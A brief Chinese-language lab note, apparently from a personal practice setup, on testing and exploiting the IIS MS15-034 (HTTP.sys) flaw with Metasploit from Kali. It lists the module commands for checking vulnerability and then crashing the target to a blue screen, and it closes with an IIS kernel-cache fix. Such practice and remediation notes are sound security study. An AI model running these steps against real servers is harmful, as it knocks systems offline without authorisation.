声明:本内容非真实商用网站,均为个人手工自行搭建的虚拟网站,仅为个人练习,无任何商业获利或者侵权行为。使用内容均为开源软件。
前提条件:vm虚拟iis网站,kali系统
kali打开msfconsole
search ms15-034
use1 进入文件后输入info查看攻击适用范围
set rhost 主机地址 show options 查看设置的信息
run验证是否存在漏洞。存在但是没有获取到内存信息。back返回即可。
以上是验证,下面使用攻击
use 0 然后设置目标主机 set rhost 主机地址
exploit攻击后目标主机蓝屏崩溃 ,需谨慎使用。
修复:找到iis的输出缓存--编辑功能设置-启用内核缓存的√去掉